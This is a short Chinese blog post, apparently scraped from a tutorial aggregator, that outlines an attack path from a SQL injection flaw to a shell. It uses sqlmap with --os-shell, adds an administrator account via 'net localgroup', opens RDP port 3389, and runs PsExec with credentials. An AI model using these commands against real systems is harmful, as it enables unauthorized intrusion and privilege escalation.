web安全概述——漏洞到获取shell
来源:互联网 发布:淘宝客导购推广位 编辑:程序博客网 时间:2024/05/16 04:50
1.find漏洞的URL
2.SQLmap注入相关细节
sqlmap.py -u "URL"
sqlmap.py -u "URL" --os-shell (拿到系统web服务器的权限)
3.黑客常用命令
net localgroup administrators 用户名 /add
4.远程桌面控制需要打开3389号端口 netstat //////mstsc (Microsoft terminal services client)命令行
开始远程桌面控制,能拿到c盘的控制权,达到更改系统c盘文件的功能。
5.更加隐蔽的工具 微软 Psexec 省去手动开启 3389端口的命令
下载链接https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec
** Psexec \\IP -u 用户名 -p 密码 cmd
阅读全文
0 0
- web安全概述——漏洞到获取shell
- web安全————文件上传漏洞
- web安全————文件上传漏洞
- Web安全测试之——XSS漏洞
- web安全——CSRF漏洞原理和解决方案
- WEB漏洞概述
- WEB漏洞概述
- web安全 CSRF漏洞
- Web安全 -- XSS漏洞
- Web安全 -- CSRF漏洞
- 【WEB安全】常见WEB漏洞
- web安全————PHP安全之文件包含漏洞
- Web入侵安全测试与对策学习笔记之(二)——获取目标信息之其他人留下的漏洞—样例程序的缺陷
- [web安全] 上传漏洞之解析漏洞
- [web安全] 上传漏洞之修复漏洞
- Android漏洞/WebView漏洞及Web安全
- [web安全] CSRF概述
- WEB安全:文件上传漏洞
- WebServie VS ICE
- centos7更换yum源为163
- Android百度地图(三):百度地图画运动轨迹及图层点击事件处理
- 数字图像处理成长之路4: C语言与离散傅立叶变换(DFT)
- 最简单的一个html页面
- web安全概述——漏洞到获取shell
- 关于特殊的LCS问题的优化
- 笔记之git工作使用
- Redis之SDS
- Python--os模块--shutil
- [linux命令] grep使用梳理
- 求二维数组每行元素之和
- Nginx安装步骤、启动和停止
- [Leetcode] #268 Missing Number
